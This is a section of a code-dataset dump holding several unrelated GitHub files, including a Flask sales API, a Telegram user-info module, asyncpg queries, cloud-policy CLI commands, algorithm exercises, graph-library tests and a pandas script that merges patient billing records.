0.0\r\n\t},\r\n\t{\r\n\t\t\"dia\": 12,\r\n\t\t\"valor\": 0.0\r\n\t},\r\n\t{\r\n\t\t\"dia\": 13,\r\n\t\t\"valor\": 3847.4823\r\n\t},\r\n\t{\r\n\t\t\"dia\": 14,\r\n\t\t\"valor\": 373.7838\r\n\t},\r\n\t{\r\n\t\t\"dia\": 15,\r\n\t\t\"valor\": 2659.7563\r\n\t},\r\n\t{\r\n\t\t\"dia\": 16,\r\n\t\t\"valor\": 48924.2448\r\n\t},\r\n\t{\r\n\t\t\"dia\": 17,\r\n\t\t\"valor\": 18419.2614\r\n\t},\r\n\t{\r\n\t\t\"dia\": 18,\r\n\t\t\"valor\": 0.0\r\n\t},\r\n\t{\r\n\t\t\"dia\": 19,\r\n\t\t\"valor\": 0.0\r\n\t},\r\n\t{\r\n\t\t\"dia\": 20,\r\n\t\t\"valor\": 35240.1826\r\n\t},\r\n\t{\r\n\t\t\"dia\": 21,\r\n\t\t\"valor\": 43829.1667\r\n\t},\r\n\t{\r\n\t\t\"dia\": 22,\r\n\t\t\"valor\": 18235.6852\r\n\t},\r\n\t{\r\n\t\t\"dia\": 23,\r\n\t\t\"valor\": 4355.0662\r\n\t},\r\n\t{\r\n\t\t\"dia\": 24,\r\n\t\t\"valor\": 13327.1025\r\n\t},\r\n\t{\r\n\t\t\"dia\": 25,\r\n\t\t\"valor\": 0.0\r\n\t},\r\n\t{\r\n\t\t\"dia\": 26,\r\n\t\t\"valor\": 0.0\r\n\t},\r\n\t{\r\n\t\t\"dia\": 27,\r\n\t\t\"valor\": 25681.8318\r\n\t},\r\n\t{\r\n\t\t\"dia\": 28,\r\n\t\t\"valor\": 1718.1221\r\n\t},\r\n\t{\r\n\t\t\"dia\": 29,\r\n\t\t\"valor\": 13220.495\r\n\t},\r\n\t{\r\n\t\t\"dia\": 30,\r\n\t\t\"valor\": 8414.61\r\n\t}\r\n]\r\n\r\n# Consultar(todos)\r\n@app.route('/vendas', methods=['GET'])\r\ndef obter_livros():\r\n return jsonify(vendas)\r\n\r\n# Consultar(id)\r\n@app.route( '/vendas/' , methods = [ 'GET' ])\r\ndef obter_livros_por_id (dia):\r\n for venda in vendas :\r\n if venda.get( \"dia\" ) == dia :\r\n return jsonify ( venda )\r\n\r\n# Editar livro\r\n@app.route('/vendas/', methods=['PUT'])\r\ndef editar_livro(dia):\r\n venda_alterada = request.get_json()\r\n for indice,venda in enumerate(vendas):\r\n if venda.get('dia') == dia:\r\n vendas[indice].update(venda_alterada)\r\n return jsonify(vendas[indice])\r\n\r\n# Adicionar nova venda\r\n@app.route('/vendas',methods=['POST'])\r\ndef adicionar_nova_venda():\r\n nova_venda = request.get_json()\r\n vendas.append(nova_venda)\r\n return jsonify(vendas)\r\n\r\n#Excluir venda\r\n@app.route('/vendas/',methods=['DELETE'])\r\ndef excluir_venda(dia):\r\n for indice,venda in enumerate(vendas):\r\n if venda.get('dia') == dia:\r\n del vendas[indice]\r\n return 
jsonify(vendas)\r\n \r\n\r\napp.run(port=5000, host='localhost', debug=True)","repo_name":"Nicolascarm/Biblioteca","sub_path":"Api.py","file_name":"Api.py","file_ext":"py","file_size_in_byte":2839,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"23777453478","text":"# python simple app\n\nimport schedule\nfrom datetime import datetime as dt\nimport time\n\n\ndef job():\n iso_str = dt.now().astimezone().replace(microsecond=0).isoformat()\n print('Hello from py-simple-app [container time is %s]' % iso_str)\n\n\nif __name__ == '__main__':\n # schedule setup\n schedule.every(5).seconds.do(job)\n # first run now\n job()\n # main loop\n while True:\n schedule.run_pending()\n time.sleep(0.5)\n","repo_name":"sourceperl/docker.cookbook","sub_path":"py-simple-app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"26970437748","text":"# Major change by @Fl1yd\n#\n# Channel: @ftgmodulesbyfl1yd\n# ============================\n\nimport os\nfrom .. import loader, utils\nfrom telethon.tl.functions.photos import GetUserPhotosRequest\nfrom telethon.tl.functions.users import GetFullUserRequest\nfrom telethon.tl.types import MessageEntityMentionName\n\n\ndef register(cb):\n cb(WhoIsMod())\n\n\nclass WhoIsMod(loader.Module):\n \"\"\"Получает информацию о пользователе в Телеграме (включая вас!).\"\"\"\n strings = {'name': 'WhoIs'}\n\n async def whoiscmd(self, whos):\n \"\"\"Используй .whois <@ или реплай>; ничего\"\"\"\n await whos.edit(\"Получаю информацию о пользователе...\")\n replied_user = await get_user(whos)\n\n try:\n photo, caption = await fetch_info(replied_user, whos)\n except AttributeError:\n whos.edit(\"Не могу найти информацию об этом пользователе.\")\n return\n\n message_id_to_reply = whos.reply_to_msg_id\n if not message_id_to_reply:\n message_id_to_reply = None\n\n try:\n await whos.client.send_file(whos.chat_id, photo, caption=caption,\n link_preview=False, force_document=False,\n reply_to=message_id_to_reply, parse_mode=\"html\")\n if not photo.startswith(\"http\"):\n os.remove(photo)\n await whos.delete()\n except TypeError:\n await whos.edit(caption, parse_mode=\"html\")\n\n\nasync def get_user(event):\n \"\"\"Получение информации о пользователе с реплая или аргумента.\"\"\"\n if event.reply_to_msg_id and not utils.get_args_raw(event):\n previous_message = await event.get_reply_message()\n replied_user = await event.client(GetFullUserRequest(previous_message.from_id))\n else:\n user = utils.get_args_raw(event)\n if user.isnumeric():\n user = int(user)\n if not user:\n self_user = await event.client.get_me()\n user = self_user.id\n if event.entities is not None:\n probable_user_mention_entity = event.entities[0]\n if isinstance(probable_user_mention_entity, MessageEntityMentionName):\n user_id = probable_user_mention_entity.user_id\n replied_user = await event.client(GetFullUserRequest(user_id))\n return replied_user\n try:\n user_object = await event.client.get_entity(user)\n replied_user = await event.client(GetFullUserRequest(user_object.id))\n except:\n self_user = await event.client.get_me()\n user = self_user.id\n user_object = await event.client.get_entity(user)\n replied_user = await event.client(GetFullUserRequest(user_object.id))\n return replied_user\n return replied_user\n\n\nasync def fetch_info(replied_user, event):\n \"\"\"Подробная информация о пользователе.\"\"\"\n 
replied_user_profile_photos = await event.client(GetUserPhotosRequest(user_id=replied_user.user.id,\n offset=42, max_id=0, limit=80))\n replied_user_profile_photos_count = \"Пользователю нужна помощь с загрузкой аватарки.\"\n try:\n replied_user_profile_photos_count = replied_user_profile_photos.count\n except AttributeError as e:\n pass\n user_id = replied_user.user.id\n first_name = replied_user.user.first_name\n last_name = replied_user.user.last_name\n common_chat = replied_user.common_chats_count\n username = replied_user.user.username\n user_bio = replied_user.about\n is_bot = replied_user.user.bot\n if is_bot == False:\n is_bot = \"Нет\"\n else:\n is_bot = \"Да\"\n restricted = replied_user.user.restricted\n if restricted == False:\n restricted = \"Нет\"\n else:\n restricted = \"Да\"\n verified = replied_user.user.verified\n if verified == False:\n verified = \"Нет\"\n else:\n verified = \"Да\"\n photo = await event.client.download_profile_photo(user_id, str(user_id) + \".jpg\", download_big=True)\n first_name = first_name.replace(\"\\u2060\", \"\") if first_name else \"Пользователь не указал имя.\"\n last_name = last_name.replace(\"\\u2060\", \"\") if last_name else \"Пользователь не указал фамилию.\"\n username = \"@{}\".format(username) if username else \"У пользователя нет юзернейма.\"\n user_bio = \"У пользователя нет информации о себе.\" if not user_bio else user_bio\n\n caption = \"ИНФОРМАЦИЯ О ПОЛЬЗОВАТЕЛЕ:\\n\\n\"\n caption += f\"Имя: {first_name}\\n\"\n caption += f\"Фамилия: {last_name}\\n\"\n caption += f\"Юзернейм: {username}\\n\"\n caption += f\"ID: {user_id}\\n\"\n caption += f\"Бот: {is_bot}\\n\"\n caption += f\"Ограничен: {restricted}\\n\"\n caption += f\"Верифицирован: {verified}\\n\\n\"\n caption += f\"О себе: \\n{user_bio}\\n\\n\"\n caption += f\"Кол-во аватарок в профиле: {replied_user_profile_photos_count}\\n\"\n caption += f\"Общие чаты: {common_chat}\\n\"\n caption += f\"Пермалинк: \"\n caption += f\"клик\"\n\n return photo, caption","repo_name":"Fl1yd/FTG-Modules","sub_path":"whois.py","file_name":"whois.py","file_ext":"py","file_size_in_byte":5680,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"16"} +{"seq_id":"14453641793","text":"from asyncpg import Record\nfrom records.errors import AlbumNotFound, ArtistNotFound\nfrom records import models\nfrom .connection import get_connection\n\n\ndef _db_record_to_album(r: Record) -> models.Album:\n return models.Album(\n id=r[\"album_id\"],\n name=r[\"album_name\"],\n artist=models.Artist(\n id=r[\"artist_id\"],\n name=r[\"artist_name\"],\n ),\n )\n\n\nasync def get_album(album_id: int) -> models.Album:\n async with get_connection() as conn:\n result = await conn.fetchrow(\n \"\"\"\n SELECT\n ar.id AS artist_id,\n ar.name AS artist_name,\n al.id AS album_id,\n al.name AS album_name\n FROM albums AS al\n LEFT JOIN artists AS ar ON al.artist_id = ar.id\n WHERE al.id = $1\n \"\"\",\n album_id,\n )\n if result is None:\n raise AlbumNotFound()\n return _db_record_to_album(result)\n\n\nasync def get_albums() -> list[models.Album]:\n async with get_connection() as conn:\n result = await conn.fetch(\n \"\"\"\n SELECT\n ar.id AS artist_id,\n ar.name AS artist_name,\n al.id AS album_id,\n al.name AS album_name\n FROM albums AS al\n LEFT JOIN artists AS ar ON al.artist_id = ar.id\n \"\"\"\n )\n return [_db_record_to_album(a) for a in result]\n\n\nasync def create_album(album: models.AlbumIn) -> models.Album:\n async with get_connection() as conn:\n artist = await conn.fetchrow(\n 
\"\"\"\n SELECT id FROM artists WHERE id = $1\n \"\"\",\n album.artist_id,\n )\n if artist is None:\n raise ArtistNotFound()\n result = await conn.fetch(\n \"\"\"\n INSERT INTO albums(\n name,\n artist_id\n ) VALUES($1, $2) RETURNING id\n \"\"\",\n album.name,\n album.artist_id,\n )\n\n out = await conn.fetchrow(\n \"\"\"\n SELECT\n ar.id AS artist_id,\n ar.name AS artist_name,\n al.id AS album_id,\n al.name AS album_name\n FROM albums AS al\n LEFT JOIN artists AS ar ON al.artist_id = ar.id\n WHERE al.id = $1\n \"\"\",\n result[0][\"id\"],\n )\n\n return _db_record_to_album(out)\n","repo_name":"dantheman39/fast-api-quickstart","sub_path":"records/db/albums.py","file_name":"albums.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12444416230","text":"import re, pprint\n\n\nclass symbol:\n pixels: list[list[bool]]\n char: int\n real: str\n index: int\n\n def __init__(self,p,c,r,i):\n self.pixels = p\n self.char = c\n self.real = r\n self.index = i\n def __repr__ (self): return self.__str__()\n def __str__(self): return f\"// {self.real:0>4x} {self.char} {self.index}\"\n \n def to_print(self):\n out = \"\\t\"\n a = []\n for row in self.pixels:\n out = f'{out}0x{int(\"\".join(map(str,map(int,row))),2):0>2x}, '\n out = f'{out} {self.__str__()}'\n return out\n\n def rotate_90_ccw(self):\n npx = []\n for i in reversed(range(8)):\n new = []\n for b in range(8):\n new.append(self.pixels[b][i])\n npx.append(new)\n self.pixels = npx\n pass\n\nsyms: dict[int,symbol] = {}\n\nregex = re.compile(\"\\t0x..,.*\")\n\ndef strToBin(s):\n return s == \"1\"\n\nwith open(\"font.h\",'r') as f:\n contents = f.readlines()\n for line in contents:\n if regex.match(line):\n sline = line.strip()\n parts = sline.split(\" \")\n \n px = []\n\n for i in range(8):\n bits = []\n bits[:] = f'{int(parts[i][2:-1],16):0>8b}'\n bits = list(map(strToBin,bits))\n px.append(bits)\n print(line,parts)\n sym = symbol(px,parts[12],int(parts[11],16),int(parts[13]))\n sym.rotate_90_ccw()\n syms[int(parts[11],16)] = sym\n\nprint(f\"const static byte Alphabet[{len(syms)*8}] = {'{'}\")\nfor line in syms.values():\n print(line.to_print())\nprint(\"};\")\nlist(map(symbol.to_print,syms.values()))\n","repo_name":"walksanatora/sketch_jan18a","sub_path":"util/rotate_font.py","file_name":"rotate_font.py","file_ext":"py","file_size_in_byte":1694,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"40183946492","text":"import json\nfrom pathlib import Path\n\nimport click\n\nfrom c7ncli.group import cli_response, ViewCommand, response, \\\n ContextObj, customer_option\nfrom c7ncli.service.constants import PARAM_CUSTOMER, PARAM_NAME, \\\n PARAM_PERMISSIONS\n\n\n@click.group(name='policy')\ndef policy():\n \"\"\"Manages Custodian Service Policy Entities\"\"\"\n\n\n@policy.command(cls=ViewCommand, name='describe')\n@click.option('--policy_name', '-name', type=str,\n help='Policy name to describe.')\n@customer_option\n@cli_response(attributes_order=[PARAM_CUSTOMER, PARAM_NAME, PARAM_PERMISSIONS])\ndef describe(ctx: ContextObj, customer_id, policy_name=None):\n \"\"\"\n Describes Custodian Service policies of a customer\n \"\"\"\n return ctx['api_client'].policy_get(\n customer_display_name=customer_id,\n policy_name=policy_name\n )\n\n\n@policy.command(cls=ViewCommand, name='add')\n@click.option('--policy_name', '-name', type=str, required=True,\n help='Policy name to 
create')\n@click.option('--permission', '-p', multiple=True,\n help='List of permissions to attach to the policy')\n@click.option('--path_to_permissions', '-path', required=False,\n help='Local path to .json file that contains list of '\n 'permissions to attach to the policy')\n@customer_option\n@cli_response(attributes_order=[PARAM_CUSTOMER, PARAM_NAME, PARAM_PERMISSIONS])\ndef add(ctx: ContextObj, customer_id, policy_name, permission,\n path_to_permissions):\n \"\"\"\n Creates a Custodian Service policy for a customer\n \"\"\"\n if not permission and not path_to_permissions:\n return response('--permission or --path_to_permissions '\n 'must be provided')\n permissions = list(permission)\n if path_to_permissions:\n path = Path(path_to_permissions)\n if not path.exists() or not path.is_file():\n return response(f'File {path_to_permissions} does not exist')\n with open(path, 'r') as file:\n try:\n data = json.load(file)\n except json.JSONDecodeError as e:\n data = []\n permissions.extend(data)\n\n return ctx['api_client'].policy_post(\n name=policy_name,\n permissions=permissions,\n customer=customer_id,\n )\n\n\n@policy.command(cls=ViewCommand, name='update')\n@click.option('--policy_name', '-name', type=str, required=True)\n@click.option('--attach_permission', '-ap', multiple=True,\n required=False,\n help='Names of permissions to attach to the policy')\n@click.option('--detach_permission', '-dp', multiple=True,\n required=False,\n help='Names of permissions to detach from the policy')\n@customer_option\n@cli_response(attributes_order=[PARAM_CUSTOMER, PARAM_NAME, PARAM_PERMISSIONS])\ndef update(ctx: ContextObj, customer_id, policy_name, attach_permission,\n detach_permission):\n \"\"\"\n Updates permission-list within a Custodian Service policy\n \"\"\"\n\n if not attach_permission and not detach_permission:\n return response('At least one of the following arguments must be '\n 'provided: attach_permission, detach_permission')\n\n return ctx['api_client'].policy_patch(\n customer=customer_id,\n name=policy_name,\n permissions_to_attach=attach_permission,\n permissions_to_detach=detach_permission\n )\n\n\n@policy.command(cls=ViewCommand, name='delete')\n@click.option('--policy_name', '-name', type=str, required=True,\n help='Policy name to delete')\n@customer_option\n@cli_response()\ndef delete(ctx: ContextObj, customer_id, policy_name):\n \"\"\"\n Deletes a Custodian Service policy of a customer\n \"\"\"\n if policy_name:\n policy_name = policy_name.lower()\n return ctx['api_client'].policy_delete(\n customer_display_name=customer_id,\n policy_name=policy_name.lower())\n\n\n@policy.command(cls=ViewCommand, name='clean_cache')\n@click.option('--policy_name', '-name', type=str,\n help='Policy name to clean from cache. 
If not specified, '\n 'all policies cache within the customer is cleaned')\n@customer_option\n@cli_response()\ndef clean_cache(ctx: ContextObj, policy_name, customer_id):\n \"\"\"\n Clears out cached Custodian Service policies within Lambda\n \"\"\"\n return ctx['api_client'].policy_clean_cache(\n customer=customer_id,\n name=policy_name\n )\n","repo_name":"epam/ecc","sub_path":"c7n/c7ncli/group/policy.py","file_name":"policy.py","file_ext":"py","file_size_in_byte":4440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"43771206755","text":"from uuid import UUID\nfrom uuid import uuid4\nfrom typing import List\nfrom typing import Dict\nfrom typing import Optional\nfrom datetime import datetime\nfrom collections import Counter\nimport dataclasses\nimport winter\n\n\n@dataclasses.dataclass\nclass Comment:\n id: UUID\n topic: str\n author: str\n text: str\n timestamp: datetime\n\n\n@dataclasses.dataclass\nclass TopicStatistics:\n topic: str\n comment_count: int\n\n\ncomments: List[Comment] = [\n Comment(uuid4(), '11e7f524-8729-4286-81c4-991a10f408c1', 'Alexander E', 'Just a test comment', datetime(2022, 8, 31, 10, 11, 00)),\n Comment(uuid4(), '11e7f524-8729-4286-81c4-991a10f408c1', 'Alexander E', 'One more test comment', datetime(2022, 8, 31, 10, 12, 00)),\n Comment(uuid4(), '11e7f524-8729-4286-81c4-991a10f408c1', 'Alexander E', 'The third comment from my side', datetime(2022, 8, 31, 10, 13, 00)),\n Comment(uuid4(), '2b892f00-2b44-4351-9d18-f6b19c1d6d42', 'Alexander E', 'Is it finished?', datetime(2022, 8, 31, 10, 14, 00)),\n Comment(uuid4(), '2b892f00-2b44-4351-9d18-f6b19c1d6d42', 'Ivan Ivanov', 'Nope', datetime(2022, 8, 31, 10, 15, 00)),\n Comment(uuid4(), '333a2af4-4d24-446b-9024-95c477a25e93', 'Alexander E', 'How are you?', datetime(2022, 8, 31, 10, 16, 00)),\n Comment(uuid4(), '333a2af4-4d24-446b-9024-95c477a25e93', 'Ivan Ivanov', 'Fine, how are you?', datetime(2022, 8, 31, 10, 17, 00)),\n Comment(uuid4(), '333a2af4-4d24-446b-9024-95c477a25e93', 'Alexander E', \"Thanks, I'm good\", datetime(2022, 8, 31, 10, 18, 00)),\n]\n\n\n@winter.web.no_authentication\nclass CommentAPI:\n @winter.route_post('comments/')\n @winter.request_body('comment')\n def create_comment(self, comment: Comment):\n comments.append(comment)\n\n @winter.route_delete('comments/{comment_id}/')\n def delete_comment(self, comment_id: UUID):\n global comments\n comments = [comment for comment in comments if comment.id != comment_id]\n\n @winter.route_get('comments/{?topic}')\n def get_comments(self, topic: Optional[str] = None) -> List[Comment]:\n result = comments.copy()\n if topic is not None:\n result = [comment for comment in result if comment.topic == topic]\n return result\n\n @winter.route_get('topic-statistics/{?topics*}')\n def get_topic_statistics(self, topics: List[str]) -> List[TopicStatistics]:\n counter = Counter([comment.topic for comment in comments if comment.topic in topics])\n return [TopicStatistics(topic, count) for topic, count in counter.items()]\n","repo_name":"TodoAppDemoOrg/comment-service","sub_path":"src/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":2520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"14114785269","text":"import math\n\ndef connected_set(com_set):\n cnt = 0\n for idx in range(1, len(com_set) + 1):\n if com_set[idx] < 0:\n cnt += 1\n return cnt\n\n\ndef checking(com_set, cmp1, cmp2):\n root1 = find_root(com_set, cmp1)\n root2 = 
find_root(com_set, cmp2)\n\n if root1 == root2 and root1 > 0:\n return True\n return False\n\ndef find_root(com_set, cmp):\n par = cmp\n\n while cmp > 0:\n par = cmp\n cmp = com_set[cmp]\n\n return par\n\ndef connecting(com_set, cmp1, cmp2):\n if not checking(com_set, cmp1, cmp2):\n root1 = find_root(com_set, cmp1)\n root2 = find_root(com_set, cmp2)\n val1 = math.fabs(com_set[root1])\n val2 = math.fabs(com_set[root2])\n if val1 > val2:\n com_set[root2] = root1\n elif val1 < val2:\n com_set[root1] = root2\n else:\n com_set[root2] = root1\n com_set[root1] = -(val1 + 1)\n\n\ndef main():\n amo = int(input())\n\n com_set = {}\n for idx in range(1, amo + 1):\n com_set[idx] = -1\n\n info = input()\n while info != \"S\":\n info_lst = info.split() \n act = info_lst[0]\n cmp1 = int(info_lst[1])\n cmp2 = int(info_lst[2])\n if act == \"I\":\n connecting(com_set, cmp1, cmp2)\n elif act == \"C\":\n if checking(com_set, cmp1, cmp2):\n print(\"yes\")\n else:\n print(\"no\")\n info = input()\n\n total = connected_set(com_set)\n if total == 1:\n print(\"The network is connected.\")\n else:\n print(\"There are \"+ str(total) + \" components.\")\n \n \nmain()","repo_name":"xiaoyueli/MOOC","sub_path":"DatastructureAndAlgorithm/DataStructure-ZhejiangU(20160229-20160603)/week5_FileTransfer.py","file_name":"week5_FileTransfer.py","file_ext":"py","file_size_in_byte":1632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"8106877211","text":"import math\nimport sys\n# input = sys.stdin.readline\n\ndef f(index): # distance\n return math.sqrt((mxList[index] - kxList[index])**2 + (myList[index] - kyList[index])**2)\n \nax, ay, bx, by, cx, cy, dx, dy = map(int, input().strip().split())\n\n# m : 민호\n# k : 강호\n\nstep1 = (bx-ax) / 1000000\nstart1 = ax\nmxList = []\nfor i in range(1000000):\n mxList.append(start1)\n if start1 == bx:\n break\n start1 += step1\n \nstep2 = (by-ay) / 1000000\nstart2 = ay\nmyList = []\nfor i in range(1000000):\n myList.append(start2)\n if start2 == by:\n break\n start2 += step2\n\nstep3 = (dx-cx) / 1000000\nstart3 = cx\nkxList = []\nfor i in range(1000000):\n kxList.append(start3)\n if start3 == dx:\n break\n start3 += step3\n \nstep4 = (dy-cy) / 1000000\nstart4 = cy\nkyList = []\nfor i in range(1000000):\n kyList.append(start4)\n if start4 == dy:\n break\n start4 += step4 \n \nstart = 0\nend = len(mxList)-1\n\np, q = 0, 0\nwhile end - start >= 3:\n p = (start*2 + end) // 3\n q = (start + end*2) // 3\n if f(p) <= f(q):\n end = q\n else:\n start = p\n\nresult = 1000000\nfor i in range(1000000):\n result = min(result, f(i))\n\nprint(result)\n \n ","repo_name":"micopes/Algorithm","sub_path":"알고리즘 - 파이썬/백준(acmicpc.net)/이진 탐색/삼분 탐색/11662 민호와 강호 - 삼분탐색 그러나, 오차때문에 실패..py","file_name":"11662 민호와 강호 - 삼분탐색 그러나, 오차때문에 실패..py","file_ext":"py","file_size_in_byte":1203,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"71095654087","text":"import pytest\n\nfrom jgrapht import create_graph\n\nimport jgrapht.algorithms.spanning as spanning\nimport jgrapht.generators as generators\n\n\ndef build_graph():\n g = create_graph(\n directed=False,\n allowing_self_loops=False,\n allowing_multiple_edges=False,\n weighted=True,\n )\n\n for i in range(0, 10):\n g.add_vertex(i)\n\n g.add_edge(0, 1)\n g.add_edge(0, 2)\n g.add_edge(0, 3)\n g.add_edge(0, 4)\n g.add_edge(0, 5)\n g.add_edge(0, 6)\n g.add_edge(0, 7)\n g.add_edge(0, 8)\n g.add_edge(0, 9)\n\n g.add_edge(1, 2)\n g.add_edge(2, 3)\n g.add_edge(3, 
4)\n g.add_edge(4, 5)\n g.add_edge(5, 6)\n g.add_edge(6, 7)\n g.add_edge(7, 8)\n g.add_edge(8, 9)\n g.add_edge(9, 1)\n\n return g\n\n\ndef test_kruskal():\n g = build_graph()\n mst_w, mst_edges = spanning.kruskal(g)\n assert mst_w == 9.0\n expected = set([0, 1, 2, 3, 4, 5, 6, 7, 8])\n solution = set(mst_edges)\n assert expected == solution\n\n\ndef test_prim():\n g = build_graph()\n mst_w, mst_edges = spanning.prim(g)\n assert mst_w == 9.0\n expected = set([0, 1, 2, 3, 4, 5, 6, 7, 8])\n solution = set(mst_edges)\n assert expected == solution\n\n\ndef test_boruvka():\n g = build_graph()\n mst_w, mst_edges = spanning.boruvka(g)\n assert mst_w == 9.0\n expected = set([0, 1, 2, 3, 4, 5, 6, 7, 8])\n solution = set(mst_edges)\n assert expected == solution\n\n\ndef test_small_graph_prim():\n g = create_graph(directed=False)\n\n generators.gnp_random_graph(g, n=500, p=0.1, seed=17)\n\n mst_w, mst_edges = spanning.prim(g)\n assert mst_w == 499.0\n\n\ndef test_anyhashableg_prim():\n g = create_graph(\n directed=False,\n allowing_self_loops=False,\n allowing_multiple_edges=False,\n weighted=True,\n any_hashable=True,\n )\n\n g.add_vertex(\"0\")\n g.add_vertex(\"1\")\n g.add_vertex(\"2\")\n\n e1 = g.add_edge(\"0\", \"1\")\n g.set_edge_weight(e1, 1.0)\n e2 = g.add_edge(\"1\", \"2\")\n g.set_edge_weight(e2, 2.0)\n e3 = g.add_edge(\"2\", \"0\")\n g.set_edge_weight(e3, 3.0)\n\n mst_w, mst_edges = spanning.prim(g)\n assert mst_w == 3.0\n assert set(mst_edges) == {e1, e2}\n \ndef test_result_with_difference(): \n g = build_graph()\n mst_weight, mst_tree = spanning.prim(g)\n\n non_mst_edges = g.edges - set(mst_tree)\n\n # test that our intermediate set results, property implement\n # method _from_iterable\n\n assert non_mst_edges == { 9, 10, 11, 12, 13, 14, 15, 16, 17 }\n\ndef test_result_with_difference_symmetric(): \n g = build_graph()\n mst_weight, mst_tree = spanning.prim(g)\n\n non_mst_edges = g.edges - set(mst_tree)\n\n # test that our intermediate set results, property implement\n # method _from_iterable\n\n assert non_mst_edges == { 9, 10, 11, 12, 13, 14, 15, 16, 17 }\n","repo_name":"d-michail/python-jgrapht","sub_path":"tests/test_mst.py","file_name":"test_mst.py","file_ext":"py","file_size_in_byte":2797,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"16"} +{"seq_id":"41187970065","text":"n = list()\nresult = False\nfor i in range(int(input(\"Введите количество чисел: \"))):\n n.append(int(input()))\na = int(input())\nfor i in range(len(n)):\n for j in range(len(n) - i):\n if (n[i] * n[j]) == a:\n result = True\nif result:\n print(\"Да\")\nelse:\n print(\"Нет\")\n","repo_name":"Isinbaeva/M-21","sub_path":"10/1.py","file_name":"1.py","file_ext":"py","file_size_in_byte":318,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"6550540145","text":"import os\nimport subprocess\n\n\ndef format_file(file_path):\n subprocess.run([\"black\", file_path], check=True)\n\n\ndef main():\n for root, dirs, files in os.walk(\".\"):\n if \"venv\" in dirs:\n dirs.remove(\"venv\") # don't visit this directory\n\n for name in files:\n if name.endswith(\".py\"):\n format_file(os.path.join(root, name))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"abryant710/auto-codebase-documenter","sub_path":"format_code.py","file_name":"format_code.py","file_ext":"py","file_size_in_byte":416,"program_lang":"python","lang":"en","doc_type":"code","stars":89,"dataset":"github-code","pt":"16"} 
+{"seq_id":"32441306043","text":"import pandas as pd\nfrom datetime import datetime\n\ndef data_processing(rhino_report, red_rc, dsp_patients, start_date, end_date, output_location):\n try:\n pd.set_option('display.float_format', lambda x: '%.0f' % x)\n fields_for_rhino = ['clinician_first_name', 'clinician_last_name', 'encounter_date', 'encounter_time', 'encounter_id', 'first_name', 'last_name', 'date_of_birth', 'age_at_presentation', 'gender', 'medicare_number', 'indigenous_status', 'address_line1', 'suburb', 'state', 'postcode', 'emergency_contact_name', 'country_of_birth','home_language', 'patient_symptoms', 'usual_medications', 'specimen_collected', 'diagnosis', 'outcome']\n rhino_report = pd.read_excel(rhino_report, dtype={'medicare_number': 'str'},usecols= fields_for_rhino)\n red_rc = pd.read_csv(red_rc, header=0, encoding='CP1252')\n dsp_patients = pd.read_csv(dsp_patients, header=0, encoding='CP1252')\n red_rc = red_rc.drop(columns=['Patient','Patient Type','Payer','Account Payer Type', 'Date','Brn','Doc','Stf','Inv #','Item','Transaction Type','Transaction Status','GST','Amount','Fee Type','Analysis Group'])\n red_rc = red_rc.rename(columns={'File #': 'FILE_NUMBER'})\n dsp_patients = dsp_patients.drop(columns=['patient_name','full_name', 'full_suburb', 'address', 'full_mailing_suburb', 'TITLE', 'HOME_ADDRESS_LINE_2', 'USUAL_CLINIC', 'USUAL_DOCTOR', 'TYPE_CODE',\t'STATUS_CODE', 'PRACTICE_DEFINABLE_FIELD1_CODE', 'PRACTICE_DEFINABLE_FIELD2_CODE','PRACTICE_DEFINABLE_FIELD3_CODE',\t'PRACTICE_DEFINABLE_FIELD4_CODE','PRACTICE_DEFINABLE_FIELD5_CODE','PRACTICE_DEFINABLE_FIELD6','PRACTICE_DEFINABLE_FIELD7',\t'PRACTICE_DEFINABLE_FIELD8', 'PRACTICE_DEFINABLE_FIELD9', 'PRACTICE_DEFINABLE_FIELD10', 'FIRST_IN', 'LAST_IN', 'ALERTS', 'CLINIC_CODE', 'PATIENT_ID', 'MAILING_ADDRESS_LINE_1', 'MAILING_ADDRESS_LINE_2', 'MAILING_SUBURB_TOWN', 'MAILING_POSTCODE','FAMILY_ID' , 'email_ADDRESS', 'VETERAN_AFFAIRS_NUMBER','VETERAN_FILE_NUMBER_EXPIRY_DATE',\t'PATIENT_HEALTH_CARE_CARD', 'PATIENT_HLTH_CARE_CARD_EX_DATE', 'SAFETY_NET_NO', 'HOME_PHONE', 'GENDER', 'MEDICARE_BASE_NUMBER'])\n dsp_patients.FILE_NUMBER = dsp_patients.FILE_NUMBER.fillna(-1)\n dsp_patients.FILE_NUMBER = dsp_patients.FILE_NUMBER.astype(int)\n \n merged_data = pd.merge(red_rc, dsp_patients, on='FILE_NUMBER', how ='inner')\n #drop any duplicates made in the merge based off FILE_NUMBER and ENCOUNTER_DATE\n merged_data = merged_data.drop_duplicates(subset=['FILE_NUMBER', 'ServDate'])\n #format the data in the dataframe so the program can use it properly.\n # I want to have empty fields in a standard format that I can send to the browser. \n merged_data = merged_data.fillna('')\n # I want to have the medicare number/ postocode as a string so I can slice easily and send to the browser. \n merged_data.MEDICARE_NUMBER = merged_data.MEDICARE_NUMBER.astype(str)\n \n #print(merged_data_pcr)\n # remove whitepace in strings so I can index properly. 
